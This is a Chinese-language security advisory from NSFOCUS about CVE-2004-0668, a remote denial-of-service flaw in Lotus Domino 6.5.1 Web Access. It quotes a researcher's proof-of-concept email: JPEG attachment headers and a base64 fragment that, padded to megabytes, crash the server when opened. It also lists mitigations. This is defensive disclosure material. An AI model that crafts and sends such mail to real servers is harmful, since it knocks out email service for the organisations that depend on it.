安全研究

安全漏洞
IBM Lotus Domino Server Web访问恶意邮件查看远程拒绝服务漏洞

发布日期:2004-06-30
更新日期:2004-07-05

受影响系统:
Lotus Domino 6.5.1
描述:
BUGTRAQ  ID: 10641
CVE(CAN) ID: CVE-2004-0668

Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。

IBM Lotus Domino服务器不正确处理部分恶意邮件,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

攻击者可以打开邮件程序,然后写一段如下消息发送给通过Domino Web Access读取邮件的用户:

--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64

/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line ---

这样当接收者在Domino Web Access中打开邮件时,可导致Domino服务器崩溃。

<*来源:Andreas Klein (Andreas.C.Klein@physik.uni-wuerzburg.de
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108871093704307&w=2
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 限制邮件最大字节数或者关闭web-access。

厂商补丁:

Lotus
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.lotus.com/home.nsf/welcome/domino

浏览次数:3704
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障